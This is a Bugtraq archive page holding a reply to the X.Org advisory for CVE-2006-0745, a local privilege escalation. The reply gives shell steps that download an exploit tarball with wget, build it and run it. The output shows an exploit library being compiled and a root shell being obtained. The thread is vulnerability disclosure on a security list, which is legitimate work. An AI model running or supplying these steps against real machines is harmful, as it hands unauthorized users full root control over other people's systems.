Bugtraq mailing list archives

Re: [CVE-2006-0745] X.Org Security Advisory: privilege escalation and DoS in X11R6.9, X11R7.0

From: H D Moore <sflist () digitaloffense net>
Date: Mon, 20 Mar 2006 13:40:45 -0600

Two second exploit, but if anyone is lazy:

$ wget http://metasploit.com/users/hdm/tools/xmodulepath.tgz
$ tar -zpxvf xmodulepath.tgz
$ cd xmodulepath
$ ./root.sh
/bin/rm -f   exploit.o exploit.so shell *.o *.so
gcc -fPIC -c exploit.c
gcc -shared -nostdlib exploit.o -o exploit.so
gcc -o shell shell.c

X Window System Version 7.0.0
Release Date: 21 December 2005
X Protocol Version 11, Revision 0, Release 7.0
[ snip ]
r00t # id
uid=0(root) gid=100(users) groups=10(wheel),18(audio)...

On Monday 20 March 2006 08:00, Daniel Stone wrote:

X.Org Security Advisory, March 20th 2006
Local privilege escalation in X.Org server 1.0.0 and later; X11R6.9.0
and X11R7.0
CVE-ID: CVE-2006-0745

Current thread:

[CVE-2006-0745] X.Org Security Advisory: privilege escalation and DoS in X11R6.9, X11R7.0 Daniel Stone (Mar 20)
- Re: [CVE-2006-0745] X.Org Security Advisory: privilege escalation and DoS in X11R6.9, X11R7.0 H D Moore (Mar 20)
- Re: [CVE-2006-0745] X.Org Security Advisory: privilege escalation and DoS in X11R6.9, X11R7.0 Alan Coopersmith (Mar 22)
- Re: [CVE-2006-0745] X.Org Security Advisory: privilege escalation and DoS in X11R6.9, X11R7.0 Kyle Sallee (Mar 23)